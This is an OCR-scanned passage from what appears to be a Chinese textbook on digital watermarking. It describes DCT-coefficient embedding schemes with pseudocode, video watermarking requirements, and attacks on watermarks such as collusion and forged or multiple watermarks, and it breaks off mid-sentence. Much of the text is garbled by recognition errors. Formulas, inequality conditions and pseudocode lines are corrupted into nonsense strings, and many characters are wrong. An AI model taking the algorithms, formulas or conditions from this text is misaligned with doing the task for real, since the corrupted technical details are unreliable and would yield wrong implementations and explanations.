6 49 64 78 87 103 121 120 101 
J 72 92 95 98 112 100 103 99 


所 介绍 的 算法 主要 思想 是 在 一 个 图 像 块 中 调整 两 个 (或 多 个 )DCT 系数 的 相对 大 小 ， 
来 构造 对 应 的 水 印信 息 。 首 先 ， 在 编码 处 理 中 ， 发 送 者 将 载体 图 像 分 成 8x8 的 像素 块 ， 
每 一 块 只 精确 地 编码 一 个 秘密 信息 位 。 翌 入 过 程 开 始 时 ， 首 先 伪 随 机 地 选择 一 个 图 像 块 
b,， 用 它 对 第 i 个 消息 比特 进行 编码 。 令 B,= 刀 也 } 为 DCT 变换 后 的 图 像 块 。 

在 通信 开始 前 ， 发 送 者 和 接收 者 必须 对 嵌入 过 程 中 使 用 的 两 个 DOT 系数 的 位 置 达 
PB, ERNA Can) Al Cv) 来 表示 这 两 个 索引 。 这 两 个 系数 应 该 相应 于 余 
弦 变 换 的 中 频 ， 确 保 信 息 保存 在 信号 的 重要 部 位 (从 而 使 浴 入 信息 不 容易 因 JPEG 压缩 
而 完全 丢失 )。 进 一 步 而 言 ， 人 们 普遍 认为 中 频 DCT 系数 有 相似 的 数量 级 ， 我 们 可 以 假 
定 典 入 过 程 不 会 使 载体 产生 严重 降 质 。 因 为 构造 的 系统 要 在 抵抗 JPEG 压缩 方面 是 健壮 
的 。 我 们 就 选择 在 JPEG 压缩 算法 中 它们 的 量化 值 一 样 的 那些 DCT 系数 。 根 据 表 5-1, 
系数 (4,1) 和 (3,2)， 或 者 (1,2) 和 (3,0) 是 比较 好 的 。 

HIR B (1:71) >B; (u3, v2) 就 编码 为 “1”， 否 则 编码 为 “0”。 在 编码 阶段 ， 如 果 相对 
大 小 与 要 编码 的 比特 不 匹配 ， 就 相互 交换 两 个 系数 。 由 于 JPEG 压缩 〈 在 量化 阶段 ) 能 
影响 系数 的 相对 大 小 ， 算 法 应 通过 在 两 个 系数 中 加 随机 值 ， 以 确保 对 某 个 x 二 0， 使 得 
|BGasw) 一 Bi(w,v)| >x。x 值 越 大 ， 算 法 抵抗 JPEG 压缩 的 能 力 就 越 健壮 ， 然 而 图 像 的 
质量 就 越 差 。 最 后 ， 发 送 者 执行 逆 DCT 变换 把 系数 变换 回 空 间 域 。 为 了 从 图 像 中 提取 
信息 ， 必 须 对 所 有 图 像 块 进行 DCT 变换 。 通 过 比较 每 一 块 中 的 两 个 系数 ， 就 可 以 得 到 
隐藏 的 信息 。 嵌 入 和 提取 算法 如 算法 5.5 和 5.6 所 示 。 

算法 5.5 DCT 隐秘 载体 编码 过 程 

for i=1,++-,1 (M) do 

选取 一 隐蔽 数据 块 b， 

B=D{&} 

1fm;=0 then 

if B,(u,.v,) >B,(#,.v,) then 

交换 Bi(u,v) HB, (%).%) 


a: 加 


| Ba | 
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end if 

else 

ifB,(u,v) <B,(#,v,) then 

交换 Bj(u,v) 且 B; (u32) 

endif 

end if 

TAEDA BRB |B; 01:7) — B, 0:03) >x 

b,=D"{B} 

end for 

由 所 有 的 b; 来 创立 隐蔽 图 像 

算法 5.6 DCT 隐秘 载体 解码 过 程 

for 1=1,…,] (M) do 

获取 与 第 i 位 相关 的 隐蔽 数据 块 b; 

B,=D {3} 

if B,;(u,v) <B ,(w,,v,) then 

m,=0 
else 
m,=l 

end if 

end for 

如 果 所 使 用 的 DCT 系数 的 位 置 和 常数 x 选择 合适 的 话 ， 嵌 入 处 理 不 会 对 载体 产生 
视觉 上 的 降 质 。 由 于 在 量化 处 理 中 两 个 系数 被 除 以 相等 的 量化 值 ， 我 们 能 预见 这 种 方法 
对 JPEG 压缩 是 健壮 的 。 因 此 ， 它 们 的 相对 大 小 仅 受 取 整 的 影响 。 

上 面 提 到 的 系统 最 大 的 缺点 可 能 是 算法 5.5 不 能 废弃 某 些 图 像 块 ， 在 那些 图 像 块 里 
HE DCT 系数 满足 所 需要 的 关系 ， 会 严重 地 破坏 图 像 数据 。 

Zhao 和 Koch 提出 了 一 个 相似 的 系统 ， 它 没有 这 种 缺点 。 它 们 是 对 量化 后 的 DCT 
系数 进行 操作 , 并 使 用 块 中 三 个 DCT 系数 之 间 的 关系 来 保存 信息 。 发 送 者 对 图 像 块 b, 进 
行 DCT 变换 ， 并 对 其 量化 得 到 B2 。 若 一 个 块 对 比特 1 进行 编码 时 ， 让 BE (wv) 
B2 (u,v; )+D FI B? (u,v, )>B2 (u,v; )tD. 男 一 方面 ,如 对 0 进行 编码 ,让 B?(w,w)+D 
<B? (u,v; All BP (tw,Ww)+D<B? (Us.¥5)o BRD 是 描述 一 个 嵌入 位 所 需 两 个 系数 的 最 
小 距离 ， 通 常 D=1。D 越 大 ， 方 法 相对 于 图 像 处 理 技术 就 越 健 壮 。 再 一 次 强调 ， 应 该 在 
中 频 选择 这 三 个 系数 。 

在 编码 时 ， 改 变 这 三 个 系数 的 关系 使 得 它们 能 代表 一 个 秘密 信息 位 。 若 在 编码 一 个 
秘密 信息 位 时 ， 所 需要 的 修改 太 大 ， 那 么 将 这 块 标识 为 “无 效 ”， 不 用 于 信息 传输 。 如 果 
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最 大 和 最 小 的 系数 差 大 于 某 一 常数 MD， 就 属 这 种 情况 。MD 越 大 ， 就 有 更 多 的 块 可 用 
于 通信 。 考 虑 到 正确 译 码 ， 需 修改 无 效 块 的 量化 DCT 系数 ， 让 它们 满足 下 面条 件 之 一 : 
B? (u,v, XB? (Ww, )<B? (u,v, ) (5.2) 


或 
B? (u,v, )<BP (u,v; )<B 2 (ur) (5.3) 

DR EXTER HEIT EEA DCT 变换 。 

接收 者 通过 应 用 DCT 变换 和 块 量化 恢复 信息 。 如 果 在 块 中 选择 的 三 个 系数 满足 式 
(5.2) 或 (5.3)， 就 忽略 该 块 。 AP, EHE BE (14,7), BE (u,v, A BE (wy) 就 可 
以 恢复 编码 的 信息 。 由 于 所 有 修改 是 在 有 损 量 化 阶段 之 后 进行 的 ， 所 以 作者 称 这 种 嵌入 
方法 对 JPEG 压缩 (质量 因子 是 50% 时 ) 是 健壮 的 。 
5.3.2.4 ”视频 水 印 介绍 

早期 的 数字 水 印 研 究 主要 面向 静态 的 数字 图 像 对 象 。 如 今 ， 作 为 互联 网 信息 环境 下 
的 主要 多 媒体 对 象 一 一 视频 数据 越 来 越 多 地 被 考虑 到 。 视 频 水 印 面向 数字 视频 载体 ， 是 
数字 水 印 技术 中 的 热点 和 难点 。 视 频 信息 可 分 为 原始 视频 数据 和 压缩 视频 数据 两 大 类 。 
由 于 视频 信息 的 复杂 性 ， 且 在 存储 和 传输 过 程 中 往往 以 压缩 的 形式 出 现 ， 我 们 主要 介绍 
压缩 域 的 视频 水 印 技术 。 压 缩 后 的 视频 数据 则 是 以 特定 的 压缩 标准 而 存在 的 比特 数据 流 。 
为 更 好 地 研究 视频 水 印 算法 ， 必 须 首先 了 解 视频 信息 的 特点 ， 主 要 指 视频 信息 的 编码 标 
准 和 视频 时 空 特点 对 水 印信 息 的 影响 。 

1. 视频 信息 的 特点 

(1) 视频 信息 的 编码 标准 : 压缩 视频 符合 对 应 的 视频 压缩 编码 标准 。 数 字 视频 信号 ， 
是 指 由 运动 信息 连接 在 一 起 的 数字 图 像 。 由 于 原始 数字 视频 信号 数据 量 较 大 ， 在 传输 和 
存储 遇 到 困难 ， 所 以 视频 压缩 技术 一 直 是 多 媒体 技术 工作 者 的 研究 对 象 。 压 缩 技术 种 类 
繁多 ,目前 国际 标准 化 组 织 的 MPEG 工作 组 和 ITU-T 分 别 对 视频 压缩 技术 进行 了 标准 化 ， 
从 而 诞生 了 MPEG 视频 编码 标准 系列 以 及 H.261 All H.263 等 系列 标准 。 由 于 基本 原理 一 
BX, 本 文 主要 以 MPEG 编码 标准 为 研究 对 象 。 MPEG 是 活动 图 像 专家 组 (Moving Picture 
Exports Group) 的 缩写 ， 成 立 于 1988 年 。 目 前 MPEG 已 颁布 了 多 个 活动 图 像 及 其 伴音 
编码 的 正式 国际 标准 ，MPEG-1 和 MPEG-2 是 其 中 的 两 个 。MPEG-1 标准 是 在 数字 存储 
介质 中 实现 对 活动 图 像 和 声音 的 压缩 编码 ， 编 码 码 率 最 高 为 每 秒 1.5 Mb， 标 准 的 正式 规 
范 在 ISO/IEC11172 H. MPEG-1 是 一 个 开放 的 ， 统 一 的 标准 ， 在 商业 上 获得 了 巨大 的 成 
功 。 尽 管 其 图 像 质量 仅 相当 于 VHS 视频 的 质量 ， 还 不 能 满足 广播 级 的 要 求 ， 但 已 广泛 
应 用 于 VCD 等 家 庭 视 像 产品 中 .MPEG-2 标准 是 针对 标准 数字 电视 和 高 清晰 度 电视 在 各 
种 应 用 下 的 压缩 方案 和 系统 层 的 详细 规定 ， 编 码 码 率 从 每 秒 3 一 100 Mb， 标 准 的 正式 规 
范 在 ISO/IEC13818 中 。 MPEG-2 不 是 MPEG-1 的 简单 升级 , MPEG-2 在 系统 和 传送 方面 
作 了 更 加 详细 的 规定 和 进一步 的 完善 。MPEG-2 特别 适用 于 广播 级 的 数字 电视 的 编码 和 


Ea 
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传送 ， 被 认定 为 SDTV 和 HDTV 的 编码 标准 。 

MPEG 视频 编码 系统 原理 及 关键 技术 概括 地 说 ， 就 是 利用 了 图 像 中 的 两 种 特性 : 空 
间 相 关 性 和 时 间 相 关 性 。 一 帧 图 像 内 的 任何 一 个 场景 都 是 由 若干 像素 点 构成 的 ， 因 此 一 
个 像素 通常 与 它 周围 的 某 些 像素 在 亮度 和 色 度 上 存在 一 定 的 关系 ， 这 种 关系 叫做 空间 相 
关 性 ;一 个 节目 中 的 一 个 情节 常常 由 若干 帧 连续 图 像 组 成 的 图 像 序列 构成 ， 一 个 图 像 序 
列 中 前 后 帧 图 像 间 也 存在 一 定 的 关系 ， 这 种 关系 叫做 时 间 相 关 性 。 这 两 种 相关 性 使 得 图 
像 中 存在 大 量 的 元 余 信息 。 如 果 我 们 能 将 这 些 匈 余 信息 去 除 ， 只 保留 少量 非 相 关 信息 进 
行 传输 ， 就 可 以 大 大 节省 传输 频带 。 而 接收 机 利用 这 些 非 相关 信息 ， 按 照 一 定 的 解码 算 
法 ， 可 以 在 保证 一 定 的 图 像 质量 的 前 提 下 恢复 原始 图 像 。 

MPEG-1 和 2 都 采用 了 基于 离散 余弦 变换 /运动 补偿 (DCT/MC) 的 混合 编码 方案 。 
这 种 编码 方案 使 用 到 了 三 项 基本 技术 。 第 一 项 是 运动 补偿 ， 这 是 因为 视频 中 的 动态 图 像 
的 每 一 帧 和 它 的 前 帧 都 很 多 相似 之 处 ， 可 以 近似 地 从 前 一 帧 来 构造 。 第 二 项 技术 是 变换 
编码 ， 它 基于 以 下 两 个 事实 : 一 是 人 眼 对 高 频 可 视 信 息 不 敏感 ， 二 是 变换 编码 能 够 把 图 
像 的 能 量 相对 集中 ， 从 而 可 以 用 较 少 的 数据 位 来 表示 图 像 。DCT 的 压缩 技术 可 以 减少 空 
间 域 的 元 余 度 ， 它 不 仅 用 于 帧 内 压缩 ， 也 用 于 帧 问 残 差 数据 的 压缩 ;第 三 项 技术 是 焙 编 
码 ， 在 运动 补偿 和 变换 编码 后 ， 对 得 到 的 数据 进行 哈 夫 曼 编码 。 

(2) 视频 信息 的 时 空 掩蔽 效应 : 数字 水 印 技术 正 是 利用 了 人 了 眼 所 感知 的 有 限 性 ， 来 
达到 隐藏 信息 的 目的 。 视 频 水 印 的 载体 对 象 对 于 人 眼 是 运动 的 画面 ， 充 分 研究 视频 信息 
所 具有 的 三 维特 性 即 在 空间 和 时 间 上 被 人 眼 所 感知 的 强 弱 和 掩蔽 效应 ， 对 于 在 提高 水 印 
鲁 棒 性 和 水 印 容量 以 及 保证 视觉 质量 等 目标 之 间 达 到 最 佳 结 合 至 关 重 要 。 在 视频 序列 中 ， 
二 维 空间 方向 对 于 人 眼 的 掩蔽 效应 可 以 借鉴 静态 图 像 的 情况 。 这 一 类 的 研究 工作 相对 要 
多 一 些 ， 一 般 是 纹理 复杂 或 者 是 边缘 区 域 的 掩蔽 效应 要 比 平滑 区 域 的 要 强 ， 能 量 高 的 低 
频 掩蔽 系数 要 比 能 量 低 的 高 频 系数 捧 蔽 阔 值 要 大 。 而 在 一 维 时 间 方 向 上 的 掩蔽 效应 〈 也 
称 运动 掩蔽 效应 ), 需要 考虑 人 眼 对 于 运动 画面 中 不 同性 质 的 区 域 的 敏感 程度 一 般 来 讲 ， 
运动 剧烈 的 视频 区 域 相 比 运动 缓慢 的 视频 区 域 有 较 好 的 掩蔽 效果 。 充 分 考虑 视频 的 运动 
性 质 会 改善 加 水 印 视频 的 视觉 质量 ， 还 有 提出 利用 视频 运动 信息 构造 水 印 的 方法 。 随 着 
对 人 类 视觉 系统 的 深入 研究 ， 视 频 信息 对 于 人 了 眼 的 掩蔽 效应 模型 将 会 更 为 精确 地 建立 ， 
从 而 将 会 更 好 地 视频 水 印 的 性 能 。 

2. 视频 水 印 特 点 

同 其 他 水 印 技术 一 样 ， 视 频 水 印 应 满足 基本 的 水 印 性 能 要 求 ， 如 透明 性 、 重 棒 性 、 
安全 性 等 ， 也 同时 存在 以 下 儿 种 视频 水 印 特殊 要 求 。 

(1) 经 受 各 种 非 恶 意 的 视频 处 理 

视频 数据 是 一 种 特殊 的 多 媒体 数据 ， 在 传输 、 存 储 或 播放 过 程 中 ， 会 经 过 许多 特定 
的 视频 处 理 。 设 计 视 频 水 印 算法 ， 不 能 不 考虑 这 些 不 影响 视频 内 容 的 非 恶 意 处 理 。 和 吏 
态 图 像 水 印 相 比 ， 视 频 水 印 可 能 禁 受 的 处 理 要 多 得 多 ， 而 且 这 些 视 频 处 理 在 应 用 中 都 是 
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必要 的 。 

Photometric 处 理 : 这 一 类 处 理 包 含 了 所 有 导致 视频 帧 像素 发 生 了 改变 的 正常 操作 ， 
例如 在 视频 数据 传输 过 程 中 可 能 引入 的 噪声 导致 视频 像素 的 细微 改变 。 同 样 的 ， 在 视频 
数据 的 数字 模拟 之 间 相互 的 转换 过 程 中 也 会 导致 视频 信号 的 些许 失真 。 另 外 一 个 常见 的 
处 理 就 是 为 增 大 对 比 度 使 用 的 Gamma 校正 。 为 适应 视频 数据 传输 和 见效 存储 中 的 数据 
量 ， 会 采用 重 编码 等 转 码 操作 ; 由 于 压缩 率 发 生 了 改变 ， 会 引入 一 定 的 像素 失真 ， 这 对 
于 事先 加 入 的 视频 水 印信 号 的 性 能 会 产生 影响 。 不 同 视 频 标 准 之 间 的 转换 ， 例 如 
MPEG-1、MPEG-2 或 者 MPEG-4 到 目前 流行 的 网 络 流 媒体 视频 标准 H.264/AVC 等 ， 也 
同样 会 造成 视频 像素 的 改变 。 为 修复 低 质量 的 视频 信号 ， 会 考虑 采用 视频 帧 内 和 帧 间 的 
滤波 。 其 次 ， 色 度 重 采样 (4:4:4, 4:2:2, 4:2:0) 也 是 降低 视频 存储 量 的 重要 处 理 方法 。 
以 上 这 些 正常 的 视频 处 理 操作 均 会 或 多 或 少 地 改变 视频 像素 值 ， 对 视频 水 印 产生 一 定 
影响 。 

空间 去 同步 〈 儿 何 失真 ); 许多 视频 水 印 的 嵌入 和 提取 的 对 应 关系 是 严格 地 基于 视 
频 信息 空间 结构 上 的 同步 的 。 这 一 点 和 大 多 静态 图 像 水 印 技术 对 于 二 维 空间 位 置 的 敏感 
性 是 一 致 的 。 然 而 ， 许 多 非 恶 意 的 视频 处 理会 对 加 水 印 视频 信号 带 来 视频 帧 图 像 空 间 上 
的 去 同步 影响 , 从 而 对 视频 水 印 的 提取 性 能 产生 影响 ,视频 显示 比例 (4/3, 16/9 和 2.11/1) 
之 间 的 改变 和 空间 分 辩 率 (NTSC，PAL，SECAM 等 标准 ) 的 改变 都 会 带 来 视频 图 像 空 
间 上 的 去 同步 效果 。 其 次 ， 在 无 线 广播 环境 的 低 质 量 视频 中 会 出 现 位 置 抖动 现象 ， 也 会 
影响 视频 像素 的 空间 位 置 . 另 外 一 个 代表 性 的 例子 是 手持 摄像 机 对 视频 的 拍 录 转换 过 程 。 
手持 摄像 机 对 原 视频 进行 拍 录 得 到 的 视频 可 能 导致 的 两 种 去 同步 失真 ， 由 于 摄像 机 未 对 
准 视频 画面 引起 的 线性 失真 ， 以 及 拍摄 过 程 中 的 镜头 变形 引起 的 完 曲 变形 失真 。 在 对 视 
频 水 印 的 空间 去 同步 影响 进行 研究 时 , 可 以 以 12 个 参数 确定 的 变形 模型 对 手持 摄像 机 拍 
录 过 程 中 存在 的 失真 来 进行 建 模 。 

时 间 去 同步 : 视频 信息 在 时 间 方 向 上 的 去 同步 处 理 同 样 的 会 影响 视频 水 印信 号 。 这 
种 情况 一 般 由 于 视频 帧 率 的 改变 而 导致 的 。 例 如 ， 一 个 视频 水 印 系统 的 密 钥 机 制 在 每 一 
帧 加 入 水 印信 息 时 都 采用 不 同 的 密 铀 ， 如 果 视 频 帧 率 发 生 了 改变 的 话 ， 密 钥 序列 和 每 一 
视频 帧 对 应 的 关系 就 被 打 乱 。 这 样 ， 视 频 水 印 的 提取 会 因 错 误 的 密 钥 而 失败 。 视 频 帧 率 
是 常见 的 视频 处 理 ， 所 以 视频 水 印 的 设计 要 考虑 这 种 因素 。 

视频 编辑 : 随 着 视频 制作 和 处 理 技术 的 发 展 ， 视 频 编 缉 已 成 为 视频 产品 商业 化 档 中 
必 不 可 少 的 环节 。 例 如 ， 剪 切 结合 和 剪 切 后 插入 内 容 再 结合 都 是 运用 得 很 多 的 视频 编 缉 
处 理 。 在 插播 广告 时 , 需要 用 到 剪 切 插入 结合 技术 在 一 段 电 视 节 目 中 插入 广告 视频 内 容 。 
视频 节日 制作 中 ， 两 段 视频 场景 的 衔接 转换 需要 Fade-and-dissolve、wipe-and-matte 等 视 
频 效果 处 理 技术 ， 目 的 是 使 之 间 的 过 渡 切 换 显 得 更 自然 和 平滑 。 以 上 处 理 可 看 作为 时 间 
上 的 视频 编 缉 ， 空 间 上 的 编辑 处 理 则 是 指 在 视频 流 的 每 一 帧 中 加 入 额外 的 视觉 内 容 。 这 
些 包 括 图 像 覆 盖 如 字幕 、 标 识 的 插入 ， 或 者 是 画 中 画 之 类 的 一 些 技 术 。 视 频 编 缉 技术 对 
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视频 水 印 的 影响 很 大 ， 现 有 的 大 部 分 视频 水 印 技术 的 性 能 会 遭 到 破坏 。 
#52 非 恶意 视频 处 理 的 情况 


Photometric 一 加 噪 ，DA/AD 转换 
一 Gamma 校正 
一 转 码 和 视频 格式 转换 
一 帧 内 或 帧 间 滤 波 
一 色 度 采样 (4:4:4，4:2:2，4:2:0) 
空间 解 同 步 一 显示 比例 调整 (4/3, 16/9, 2.11/1) 
一 空间 分 辨 率 改 变 (NTSC, PAL, SECAM) 
一 位 置 拌 动 
一 手持 摄像 机 拍 录 
时 间 解 同步 一 帧 率 改 变 
视频 编辑 一 剪 切 结合 和 剪 切 插入 结合 


一 Fade-and-dissolve and wipe-and-matte 
一 图 像 获 盖 (字幕 、 标 识 ) 
一 Picture-in-Picture 


表 5-2 给 出 了 各 种 提 到 的 非 恶意 的 视频 处 理 技术 ， 这 是 在 学 习 视 频 水 印 技术 时 和 为 
了 研究 视频 水 印 如 何 应 付 此 类 视频 处 理 带 来 的 影响 所 需要 了 解 的 。 当 然 ， 我 们 也 须 认识 
到 ， 现 实 应 用 中 更 多 的 视频 常规 处 理 在 表 中 未 提 及 。 在 静态 图 像 水 印 测试 中 ， 我 们 用 到 
了 Stirmark 来 实现 各 种 各 样 的 局 部 的 、 随 机 的 几何 失真 。 在 视频 水 印 测试 中 ，Stirmark 
可 以 把 视频 看 作 一 幅 幅 图 像 来 处 理 实现 儿 何 失真 ， 但 是 在 时 间 方 向 上 会 出 现 明显 的 视觉 
痕迹 。 因 此 ， 为 更 好 地 对 视频 水 印 性 能 进行 测试 研究 ， 需 要 发 展 适用 视频 的 类 似 测试 
软件 。 

(2) 实时 性 

实时 性 要 求 是 视频 水 印 算 法 的 特殊 要 求 。 对 于 静态 图 像 水 印 方案 中 ， 水 印 的 嵌入 和 
检测 灌 后 数秒 钟 是 可 以 允许 的 。 而 在 实际 应 用 中 ， 在 视频 中 嵌入 和 检测 水 印信 息 一 般 不 
允许 大 量 的 耗 时 。 视 频 信号 以 较 高 的 帧 速 播放 才能 获取 视觉 上 平滑 的 效果 ( 约 25 帧 每 
秒 )。 对 于 一 个 水 印 嵌入 或 者 是 检测 来 讲 , 也 同样 应 该 至 少 能 够 保持 这 种 速度 或 者 更 快 的 
帧 率 。 在 广播 监控 应 用 中 ， 检 测 者 必须 做 到 实时 检测 。 在 VOD 环境 下 ， 视 频 点 播 服务 
器 也 被 要 求 能 以 与 视频 传输 同样 的 速率 嵌入 数字 指纹 水 印信 息 ， 这 种 数字 指纹 水 印 用 于 
区 别 不 同 的 用 户 身份 。 因 此 为 满足 实时 性 要 求 ， 视 频 水 印 算法 的 复杂 度 应 该 设计 得 尽 可 
能 低 。 

如 果 水 印信 息 能 直接 嵌入 到 视频 流 (如 MPEG 视频 流 ) 中 ， 则 避免 了 对 视频 数据 的 
完全 解压 缩 、 重 压缩 的 过 程 ， 大 大 降低 了 运算 的 复杂 度 。 所 以 ， 设 计 与 视频 编码 标准 结 
构 相 适应 的 视频 水 印 是 很 有 效 的 思路 。 一 种 基于 MPEG 的 变 长 码 (VLC) 的 快速 视频 水 
印 算 法 就 是 属于 此 类 思想 的 实时 视频 水 印 方案 。 另 外 一 种 获取 实时 性 的 方法 可 以 通过 拆 
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分 计算 量 来 实现 。 其 基本 思想 就 是 在 水 印 嵌 入 之 前 一 次 性 地 执行 完 运算 量 大 的 操作 ， 换 
取 检 测 端的 简单 运算 量 。 这 也 可 看 作为 一 种 预 处 理 措施 。Philips 研究 院 的 所 提出 的 Just 
Another Watermarking System (JAWS) 是 这 种 算法 的 代表 。JAWS 视频 水 印 算法 最 初 用 
于 广播 监控 ， 实 际 上 成 为 了 DVD 应 用 中 的 最 主要 视频 水 印 算法 。 

(3) 共 谋 攻击 

共 谋 攻击 是 在 静态 图 像 水 印 算法 中 已 经 考虑 到 的 一 种 特殊 水 印 攻击 。 它 是 指 一 个 恶 
意 的 使 用 者 群 通过 共享 他 们 的 信息 (如 不 同 的 加 水 印 数据 ), 来 产生 非法 的 内 容 (如 不 含 
水 印 的 数据 )。 共 谋 攻 击 将 在 两 种 截然 不 同 的 情况 下 有 成 功 的 可 能 性 。 

© 共 谋 攻击 类 型 I[; 相同 的 水 印 柑 入 到 不 同 的 数据 的 不 同 拷贝 中 。 共 谋 者 们 能 够 通 
过 统计 平均 每 个 单独 加 水 印 数据 的 方法 从 中 估计 出 水 印信 息 。 这 就 意味 着 只 需 减 去 水 印 
就 可 以 得 到 不 含水 印 的 数据 对 象 。 

@ 共 谋 攻击 类 型 I: 不 同 的 水 印 嵌 入 到 相同 数据 的 不 同 拷贝 中 。 共 谋 者 们 只 需 八 加 
手中 大 量 的 拷贝 ， 就 能 统计 平均 出 不 含水 印 的 数据 对 象 。 这 是 因为 统计 独立 的 水 印信 息 
的 平均 值 趋 于 0。 

共 谋 攻击 问题 在 视频 水 印 中 显得 更 为 重要 ， 因 为 视频 相 比 静态 图 像 来 讲 儿 乎 多 了 一 
倍 的 共 谋 风险 。 在 视频 水 印 算法 研究 中 ， 需 要 考虑 两 种 共 谋 攻击 。 它 们 分 别 是 视频 间 共 
谋 和 视频 内 共 谋 。 

@ 视频 间 共 谋 : 一 个 拥有 加 水 印 视频 产品 的 使 用 者 群 互 相 色 结 以 获得 一 个 不 加 水 
印 的 视频 对 象 。 例 如 ， 在 视频 版 权 保护 应 用 中 ， 相 同 的 版 权 水 印 被 加 入 到 该 版 权 所 有 的 
不 同 的 视频 产品 ， 因 此 遭受 共 谋 攻击 类 型 I 的 风险 较 大 ， 而 在 数字 指纹 应 用 中 ， 会 在 相 
同 视频 产品 中 加 入 的 水 印 来 区 别 不 同 的 用 户 ， 因 此 遭受 共 谋 攻击 类 型 M 的 风险 较 大 。 视 
频 间 共 谋 要 求 拥有 大 量 加 入 相同 水 印 的 不 同 视频 产品 拷贝 ， 或 者 是 加 入 不 同 水 印 的 相同 
视频 产品 的 拷贝 。 目 的 是 获得 不 含水 印 的 视频 内 容 。 

@ 视频 内 共 谋 : 这 是 视频 水 印 对 象 中 才 会 出 现 的 情况 。 我 们 知道 ， 视 频 序列 可 以 
看 作 一 个 连续 的 静态 图 像 序列 。 如 果 相同 的 视频 水 印加 入 到 每 一 视频 帧 ， 在 同一 视频 内 
遭受 共 谋 攻 击 类 型 I 的 风险 也 较 大 ， 这 是 因为 视频 内 存在 大 量 的 内 容 不 同 的 视频 帧 (可 
从 场景 运动 剧烈 的 视频 中 获取 )。 另 一 方面 ， 如果 不 同 的 水 印加 入 连续 的 视频 帧 中 ， 则 遭 
受 共 谋 攻击 类 型 I 的 风险 也 会 较 大 。 这 是 因为 连续 的 视频 帧 具有 高 度 相 似 性 ， 几 乎 可 以 
看 作 是 相同 的 (尤其 是 在 静止 场景 中 )。 因 此 , 视频 内 共 谋 是 设计 视频 水 印 时 要 考虑 到 的 
特殊 情况 。 

视频 水 印 算法 基本 原理 可 借鉴 静态 图 像 水 印 ， 原 则 上 前 面 所 介绍 的 LSB 和 DCT 水 
印 方法 均 可 应 用 于 视频 。 需 要 注意 的 是 ， 在 视频 水 印 设计 中 ， 还 应 考虑 到 视频 时 间 维 上 
的 因素 ， 尽 量 降低 水 印 带 来 的 视觉 失真 。 在 压缩 域 视频 中 ， 水 印信 息 按照 嵌入 的 位 置 可 
以 分 为 系数 域 、 变 长 码 (VLO 域 以 及 比特 位 域 水 印 算法 。 目 前 结合 视频 编码 的 水 印 技 
术 实时 性 一 般 都 能 达到 要 求 ， 但 是 在 鲁 棒 性 方面 〈 尤 其 是 对 几何 攻击 的 鲁 棒 性 ) 存在 问 
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题 。 在 视频 水 印 版 权 保护 系统 中 ， 实 时 性 和 和 鲁 棒 性 是 必须 解决 的 工程 应 用 问题 。 视 频 水 
印 的 共 谋 抵抗 问题 也 在 研究 之 中 ， 相 信和 不久 的 将 来 能 够 达到 实际 应 用 要 求 。 
5.3.2.5 ”攻击 方法 和 对 抗 策略 

水 印 方案 的 一 个 重要 指标 是 对 攻击 的 健壮 性 与 安全 性 。 所 谓 水 印 攻击 ， 就 是 对 现 有 
的 数字 水 印 系统 进行 攻击 。 通 过 检验 其 健壮 性 与 安全 性 ， 分 析 其 弱点 所 在 及 其 易 受 攻击 
的 原因 而 改进 设计 。 这 同 传统 密码 学 中 的 加 密 算 法 设计 和 密码 分 析 是 相似 的 。 在 对 水 印 
棋 入 技术 进行 广泛 研究 的 同时 ， 部 分 学 者 致力 于 水 印 攻击 技术 的 研究 。 与 水 印 嵌 入 技术 
的 发 展 类 似 ， 水 印 攻击 技术 也 经 历 了 一 个 快速 发 展 的 过 程 。 可 以 说 这 两 种 技术 是 在 互相 
斗争 中 同步 发 展 起 来 的 。 对 含水 印 图 像 的 常见 攻击 方法 分 为 有 意 和 无 意 攻击 两 大 类 。 

水 印 必须 对 一 些 无 意 的 攻击 具有 和 鲁 棒 性 ， 也 就 是 对 那些 能 保持 感官 相似 性 的 数字 处 
理 操作 具备 鲁 棒 性 ， 常 见 的 操作 有 : OWU: OTRAM EEE OME. A 
其 他 滤波 算法 ，@ 放 大 、 缩 小 和 旋转 ;@ 有 损 压 缩 ， 如 JPEG 压缩 ; @ 在 图 像 中 加 噪声 。 

通常 假定 在 检测 水 印 时 不 能 获得 原始 产品 。 下 面 是 有 意 攻击 一 般 分 类 : 

(1) 伪造 水 印 的 抽取 : 盗版 者 对 于 特定 产品 六 生成 的 一 个 信号 W 使 得 检测 算 子 D 
输出 一 个 肯定 结果 ， 而 且 W' 是 一 个 从 来 不 曾 嵌 入 产品 入 中 的 水 印信 号 ， 但 盗版 者 把 它 
作为 自己 的 水 印 。 但是， 如 果 算 法 G 是 不 可 逆 的 ， 并 且 W! 并 不 能 与 某 个 密 钥 联系 ， 即 
伪造 水 印 W? 是 无 效 的 水 印 ， 有 效 性 和 不 可 逆 性 的 条 件 导 致 有 效 的 伪造 水 印 的 抽取 几乎 
不 可 能 。 

(2) 伪造 的 肯定 检测 : 盗版 者 运用 一 定 的 程序 找到 某 个 密 钥 K' 能 够 使 水 印 检测 程 
序 输出 表 定 结果 并 用 该 密 钥 表明 对 产品 的 所 有 权 。 但 是 ， 在 水 印 能 够 以 很 高 的 确定 度 检 
测 时 ， 即 虚 警 概率 几乎 是 零 ， 该 攻击 方法 就 不 再 可 行 。 

(3) 统计 学 上 的 水 印 抽取 : 大 量 的 数字 图 像 用 同一 密 钥 加 入 水 印 不 应 该 能 用 统计 佑 
计 方 法 《例如 平均 ) 除去 水 印 ， 这 种 统计 学 上 的 可 重 获 性 可 以 通过 使 用 依赖 于 产品 的 水 
印 来 防止 。 

(4) 多 重水 印 : 攻击 者 可 能 会 应 用 基本 框架 的 特性 来 嵌入 他 自己 的 水 印 ， 从 而 不 管 
攻击 者 还 是 产品 的 原始 所 有 者 都 能 用 自己 的 密 钥 检测 出 自己 的 水 印 。 这 时 原始 所 有 者 必 
须 在 发 布 他 的 产品 前 保存 一 份 他 自己 的 加 水 印 的 产品 ， 用 备份 产品 来 检测 发 布 出 去 的 产 
品 是 否 被 加 了 多 重水 印 。 

1. 应 用 中 的 典型 攻击 方式 及 对 策 

我 们 必须 认识 到 面向 版 权 保护 的 强壮 水 印 技术 是 一 个 具有 相当 难度 的 研究 领域 。 直 
到 目前 , 还 没有 一 个 算法 能 够 真正 经 得 起 一 个 精明 的 攻击 者 的 进攻 。Intemet 上 已 经 可 以 
得 到 能 够 有 效 击 垮 某 些 商 业 水 印 系统 的 软件 ， 如 Stirmark 和 Unzign， 我 们 进行 攻击 分 析 
